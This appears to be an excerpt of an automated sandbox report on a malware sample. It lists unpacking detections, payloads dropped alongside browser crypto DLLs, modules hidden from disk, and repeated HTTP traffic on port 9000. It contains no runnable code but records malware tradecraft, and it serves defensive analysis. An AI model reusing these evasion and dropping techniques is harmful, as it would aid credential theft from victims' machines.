Source:	Binary string: F/,C:\tebu\watag.pdb source: QPoX60yhZt.exe, 00000000.00000002.1992058029.00000000041CE000.00000004.00000020.00020000.00000000.sdmp, QPoX60yhZt.exe, 00000000.00000000.1633911782.0000000000412000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2949744272.00000195246F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1853013778.00000000040C4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853424505.00000000048D3000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853184012.0000000004420000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082097124.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082757737.0000000005320000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225745803.00000000042DA000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225119329.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224774444.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969256826.00000195253E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BCBC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\tebu\watag.pdb source: QPoX60yhZt.exe, 00000000.00000002.1992058029.00000000041CE000.00000004.00000020.00020000.00000000.sdmp, QPoX60yhZt.exe, 00000000.00000000.1633911782.0000000000412000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\vonemupetugi\nixume\rowirelido\roxiyemayevu38\cugoca hi.pdb source: QPoX60yhZt.exe, 00000000.00000003.1687520490.0000000005D31000.00000004.00000020.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000000.1685416967.0000000000412000.00000002.00000001.01000000.00000005.sdmp

Source: QPoX60yhZt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: QPoX60yhZt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: QPoX60yhZt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: QPoX60yhZt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: QPoX60yhZt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Unpacked PE file: 1.2.u5mc.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Unpacked PE file: 0.2.QPoX60yhZt.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Unpacked PE file: 1.2.u5mc.0.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, TelemetryConfigurationFactory.cs

.Net Code: LoadInstance

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00416240

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.2.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: tiktok[1].exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: BAEBFIIECB.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: QPoX60yhZt.exe	Static PE information: real checksum: 0x67f87 should be: 0x67f89
Source: hwfesovsnabgua.3.dr	Static PE information: real checksum: 0x0 should be: 0xc411c

Source: u5mc.3.exe.0.dr	Static PE information: section name: .didata
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_041974D3 pushad ; retf	0_2_041974D4
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_04198568 push ecx; iretd	0_2_0419856E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_04199D81 pushad ; retf	0_2_04199D88
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0419B7F3 push ebp; iretd	0_2_0419B826
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_04199A6B push 2B991403h; ret	0_2_04199A72
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0419A391 push 00000061h; retf	0_2_0419A399
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BF9F6D push ecx; ret	0_2_05BF9F80
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C0C9FD push esp; retf	0_2_05C0C9FE
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C0C3FF push esp; retf	0_2_05C0C407
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C11B72 push dword ptr [esp+ecx-75h]; iretd	0_2_05C11B76
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BF9A1D push ecx; ret	0_2_05BF9A30
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C17A73 push eax; ret	0_2_05C17A91
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004176C5 push ecx; ret	1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA4B536 push ecx; ret	1_2_6BA4B549
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0015281F push esp; retn 002Eh	2_2_00152820
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00151088 push esp; retn 002Eh	2_2_00151089
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_002AFAB6 push ecx; ret	2_2_002AFAC9
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_002AFB55 push ecx; ret	2_2_002AFB68
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00151DA3 push esp; retn 002Eh	2_2_00151DA4
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00160F0B push 8B0031D1h; retf	2_2_00160F10
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0014EF7F push esp; retf 002Eh	2_2_0014EF80
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0014EFA7 push eax; retf 002Eh	2_2_0014EFA8
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C3447D9 push ecx; ret	2_2_6C3447EC
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C346365 push ecx; ret	2_2_6C346378

Source: hwfesovsnabgua.3.dr

Static PE information: section name: .text entropy: 6.816444465715168

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	Jump to dropped file
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File created: C:\Users\user\AppData\Local\Temp\u5mc.2\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File created: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ougwwmmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File created: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File created: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File created: C:\Users\user\AppData\Local\Temp\u5mc.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ougwwmmp			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\HWFESOVSNABGUA
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\OUGWWMMP

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49822
